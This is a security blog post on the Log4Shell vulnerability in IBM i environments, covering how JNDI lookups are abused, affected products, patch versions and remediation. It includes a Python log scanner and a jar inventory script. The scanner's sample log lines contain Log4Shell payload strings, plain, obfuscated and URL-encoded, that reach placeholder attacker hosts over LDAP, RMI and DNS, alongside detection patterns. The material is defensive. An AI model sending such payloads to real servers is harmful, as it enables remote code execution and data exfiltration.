ID-INFO blog

Is your IBM i vulnerable to Log4j cyber attacks?

Let’s end the suspense right now: the answer is YES.

Log4Shell, an Internet vulnerability affecting millions of computers, involves an obscure but almost ubiquitous software component, Log4j.

Log4Shell is the most serious vulnerability seen so far

The software is used to record all sorts of activities taking place under the hood in a wide range of computer systems, including the IBM i.

Jen Easterly, Director of the U.S. Cybersecurity & Infrastructure Security Agency, described Log4Shell as the most serious vulnerability she has seen in her career, an assessment shared by one of our best security colleagues, Bruce F. Bading. There have already been hundreds of thousands, perhaps millions, of attempts to exploit the vulnerability.

What does Log4j do?

Log4j records events – errors and routine system operations – and communicates diagnostic messages about them to system administrators and users. It is open source software maintained by the Apache Software Foundation.

How does Log4Shell work?

Log4Shell works by abusing a Log4j feature, the JNDI lookup, that lets a log message contain placeholders which Log4j resolves by fetching data from elsewhere, including from remote servers. This feature enables Log4j, for example, to log not only the username associated with each server connection attempt, but also the person’s real name, if a separate directory server maps usernames to real names. To do this, the application that embeds Log4j must open a connection to the server holding the real names.

Log4j opens the door to “hackers” and security holes

Unfortunately, this type of lookup can be used for more than just formatting log messages. Vulnerable versions of Log4j allow an attacker-controlled server to return software code that the targeted computer then loads and runs, and that code can perform all kinds of actions on the machine. This opens the door to nefarious activities such as stealing sensitive information, taking complete control of the targeted system and transferring malicious content to other users communicating with the server concerned.

Log4Shell is easy to exploit

Log4Shell is relatively easy to exploit. I was able to reproduce the problem in my copy of Ghidra, a reverse-engineering framework for security researchers, in just a few minutes. There is a very low bar for using this exploit, which means more people with malicious intent can use it.

Log4j is everywhere – including IBM i

One of the main concerns regarding Log4Shell is Log4j’s position in the software ecosystem. Logging is a fundamental feature of most software, which is why Log4j is so widespread. It is used in IBM WebSphere (WAS), IBM i Navigator, Apache HTTP, IBM i HA software, cloud services such as Apple iCloud and Amazon Web Services, a wide range of programs from software development tools to security tools, and any version of IBM i Access Client Solutions prior to 1.8.8.7.

This means that hackers have a wide range of targets to choose from: IBM i users, service providers, source code developers and even security researchers. So, while large companies like IBM and Amazon can quickly patch their web services to prevent hackers from exploiting them, many other organizations will take longer to patch their systems, and some may not even know they need to.

The damage that can be caused

Hackers scour the Internet for vulnerable servers and set up machines capable of delivering malicious payloads. To carry out an attack, they send requests to services (e.g. web servers) that are likely to be logged, for instance a request for a page that does not exist, which produces a 404 error. The request includes maliciously constructed text, typically in a field the server logs such as the URL or the User-Agent header, which Log4j treats as instructions.

These instructions can create a shell, which allows the attacking server to remotely control the target server, or they can enlist the target server into a botnet. Botnets are networks of compromised computers that carry out coordinated actions on behalf of the attackers.
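The detection side of the attack just described, as an added example (this is not code from the original article): a scanner over web server access log lines that collapses the nested-lookup and URL-encoding tricks attackers use to hide the literal `${jndi:` string, then reports which lookup scheme (ldap, rmi, dns, ...) the request tried to reach. The log lines are constructed samples; the IP addresses and hostnames in them are placeholders.

```python
import re
from urllib.parse import unquote

# Innermost "${...}" lookup: a body with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The payload we ultimately want to see once obfuscation has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)[^}]*\}?", re.IGNORECASE)


def _resolve_inner(m):
    """Emulate the few Log4j lookups attackers nest to hide 'jndi'.

    Log4j 2.x resolves nested lookups innermost-first, so "${${lower:J}ndi:"
    becomes "${jndi:". Only the lookups used for obfuscation are emulated:
    lower:, upper: and the ":-default" fallback ("${::-j}" and
    "${env:NOPE:-j}" both yield "j"). Anything else is left untouched.
    """
    body = m.group(1).strip()
    key = body.lower()
    if key.startswith("jndi:"):
        return m.group(0)                  # the payload itself: keep it
    if key.startswith("lower:"):
        return body[len("lower:"):].lower()
    if key.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)                      # unknown lookup: leave as-is


def normalize(text):
    """Undo URL encoding (twice, for double-encoded payloads) and collapse nested lookups."""
    text = unquote(unquote(text))
    while True:
        collapsed = _INNER.sub(_resolve_inner, text)
        if collapsed == text:
            return collapsed
        text = collapsed


def find_jndi(line):
    """Return (scheme, payload) if the line carries a JNDI lookup after normalisation, else None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    return m.group("scheme").lower(), m.group(0)


def scan_access_log(lines):
    """Return [(line_number, scheme, payload)] for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = find_jndi(line)
        if hit:
            hits.append((number, hit[0], hit[1]))
    return hits


# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_ACCESS_LOG = [
    # benign request
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain payload in the User-Agent; the missing page forces a logged 404
    '198.51.100.7 - - [10/Dec/2021:10:00:02 +0000] "GET /nope HTTP/1.1" 404 196 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    # obfuscated with nested lower: and default-value lookups, RMI transport
    '198.51.100.8 - - [10/Dec/2021:10:00:03 +0000] "GET /${${lower:j}${::-n}di:rmi://203.0.113.9:1099/Exploit} HTTP/1.1" 404 196 "-" "curl/7.68.0"',
    # URL-encoded variant in the query string, DNS transport (exfiltration probe)
    '198.51.100.9 - - [10/Dec/2021:10:00:04 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fa%7D HTTP/1.1" 200 42 "-" "-"',
]

if __name__ == "__main__":
    for number, scheme, payload in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {number}: {scheme} lookup -> {payload}")
```

Grepping for `jndi` alone misses the second and third variants above, which is why the scanner normalises first. Note that a hit in an access log only proves an attempt was made; whether it succeeded depends on the Log4j version behind that server and on whether it could reach the attacker's host.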

Hackers are already abusing Log4Shell… And in new ways. Ouch!

A large number of attackers are already trying to abuse Log4Shell. These range from ransomware gangs to groups mining cryptocurrency, and hackers associated with China and North Korea trying to gain access to the sensitive information of their geopolitical rivals. The Belgian Ministry of Defence reported that its computers were attacked using Log4Shell.

Although the vulnerability first received widespread attention on December 9, 2021, people continue to identify new ways to cause damage through this mechanism.

How do I stop the Log4j bleeding?

It is difficult to know whether Log4j is used in a given software system, since it is often bundled inside other software. This forces system administrators to inventory their software to identify its presence. If some people don’t even know they have a problem, it is that much harder to eradicate the vulnerability: you can’t defend yourself against what you don’t know.

Another consequence of Log4j’s varied uses is that there is no single solution for fixing it. Depending on how Log4j has been integrated into a given system, the patch will require different approaches. This may require a general system update, as is the case for some Cisco routers, an upgrade to a new software version, or, for those unable to update the software, manual removal of the vulnerable code (the JndiLookup class) from the Log4j jar file.

Log4j is part of the software supply chain. Like the physical objects people buy, software travels through different organizations and packages before ending up in a final product. When something goes wrong, rather than going through a recall process, the software is usually “patched”, in other words corrected in place.

Log4Shell patches may be delayed

However, since Log4j is present in various ways in software products, the propagation of a patch requires the coordination of Log4j developers, software developers who use Log4j, software distributors, system operators and users. This usually introduces a delay between the availability of the patch in the Log4j code and users’ computers closing the door on the vulnerability.

Some estimates of software repair time range from a few weeks to several months. However, if past behavior is indicative of future performance, it is likely that Log4Shell will keep resurfacing for years to come.

As a user, you’re probably wondering what you can do about all this. Unfortunately, it’s difficult to know whether a software product you’re using includes Log4j and whether it uses vulnerable versions of the software.

What you can do NOW to protect yourself from Log4Shell vulnerabilities

However, you can help by heeding the common refrain of IT security experts:

  • Make sure all your software is up to date.
  • Contact your third-party suppliers for updates.
  • Remove or disable any vulnerable versions as soon as possible.

This is particularly important if you are using an earlier or end-of-support (EOS) version of IBM i (anything older than V7.3 or V7.4).

Scans of IBM i systems, including those running older, unsupported releases, routinely turn up dozens of vulnerable Log4j files in the IFS. No system is immune, and the older it is, the more vulnerable it is.

Although the first attacks on vulnerable versions of Log4j used remote LDAP servers, attention shifted in mid-December to the Java Virtual Machine (JVM) Remote Method Invocation (RMI) protocol. LDAP and RMI are simply two of the protocols the JNDI lookup can use to reach the attacker’s server, so defences that only blocked outbound LDAP missed the RMI variant.

This means that any server running a vulnerable Log4j inside a JVM, IBM i included, is exposed to a catastrophic attack, whichever of these protocols the attacker’s server speaks.

This diagram shows how the attack was carried out.

Any Log4j 2.x release before 2.17.1 is affected by at least one of the Log4Shell-family CVEs: 2.15.0 and 2.16.0 closed the original hole but each was followed by a further CVE, so 2.17.1 or later is the version to be on (for the Java 7 and Java 6 backport branches the equivalents are 2.12.4 and 2.3.2). Log4j 1.x is end of life and receives no fixes at all, so it should be replaced rather than kept.
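An added example of the inventory step, not code from the original article or from IBM: a Python script that walks a directory tree (for instance an IFS path mounted or copied to a workstation), opens every jar/war/ear it finds, including archives nested inside other archives, reads the log4j-core version from the jar’s Maven pom.properties and checks whether JndiLookup.class is still present. It classifies each copy as fixed (2.17.1, or the 2.12.4 / 2.3.2 backports), vulnerable, or mitigated by the JndiLookup removal stop-gap. The tree it scans is a constructed fixture built in a temporary directory; the file locations under QIBM and home are invented for the demo and do not correspond to real IBM i product paths.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); missing components are padded with zeros."""
    nums = [int(x) for x in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def status_for(version, has_jndi_lookup):
    """Classify one log4j-core build: fixed releases are 2.17.1 and the Java 7 / Java 6
    backports 2.12.4 / 2.3.2. A jar with JndiLookup.class deleted is the stop-gap for
    systems that cannot upgrade and is reported separately, not as 'fixed'."""
    if version == "unknown":
        return "unknown-version"
    v = parse_version(version)
    if v[:2] == (2, 3):
        fixed = (2, 3, 2)
    elif v[:2] == (2, 12):
        fixed = (2, 12, 4)
    else:
        fixed = (2, 17, 1)
    if v >= fixed:
        return "fixed"
    return "vulnerable" if has_jndi_lookup else "mitigated-jndilookup-removed"


def inspect_archive(zf, location, findings):
    """Record every log4j-core in zf, descending into nested jar/war/ear entries."""
    names = set(zf.namelist())
    if POM in names:
        props = zf.read(POM).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.MULTILINE)
        version = m.group(1).strip() if m else "unknown"
        findings.append((location, version, status_for(version, JNDI_LOOKUP in names)))
    for name in names:
        if name.lower().endswith(ARCHIVES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(inner, f"{location}!{name}", findings)


def scan_tree(root):
    """Walk a directory tree and return sorted (location, version, status) findings."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVES:
            try:
                zf = zipfile.ZipFile(path)
            except zipfile.BadZipFile:
                continue
            inspect_archive(zf, path.relative_to(root).as_posix(), findings)
    return sorted(findings)


# Constructed fixture for the demo (invented paths, not a real IBM i IFS).
def jar_bytes(version, with_jndi_lookup=True):
    """Build a minimal fake log4j-core jar in memory; class entries are stubs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM, f"artifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def build_fixture(root):
    root = Path(root)
    files = {
        "QIBM/UserData/lib/log4j-core-2.14.1.jar": jar_bytes("2.14.1"),
        "QIBM/UserData/lib/log4j-core-2.17.1.jar": jar_bytes("2.17.1"),
        # JndiLookup.class removed by hand: the stop-gap, not a real fix
        "home/app/lib/log4j-core-2.12.1.jar": jar_bytes("2.12.1", with_jndi_lookup=False),
    }
    for rel, data in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(data)
    # a copy hidden inside a web application archive
    with zipfile.ZipFile(root / "home/app/webapp.war", "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", jar_bytes("2.16.0"))
    return root


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_fixture(tmp))


if __name__ == "__main__":
    for location, version, status in demo():
        print(f"{status:30} {version:8} {location}")
```

Two caveats for real runs: a jar that was shaded or repackaged may not carry pom.properties, so treat “no finding” as “not detected” rather than “not present” (hashing the class files against known Log4j builds is the next step), and a jar showing as mitigated still needs the upgrade to 2.17.1 once the vendor ships it.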

The Center for Internet Security has the most up-to-date information available. The best advice we can give you is to be careful about where you get your information, as bad information can leave you vulnerable to attack.

The best thing to do is to scan now, before it’s too late.

Log4j Zero-Day Vulnerability Response (cisecurity.org) – Original article by Bob Losey: https://cutt.ly/DPAcTSM

Do you have any questions or projects concerning log4j vulnerability? Our teams are at your service. Contact us on 01 88 32 12 34, or via the contact form.
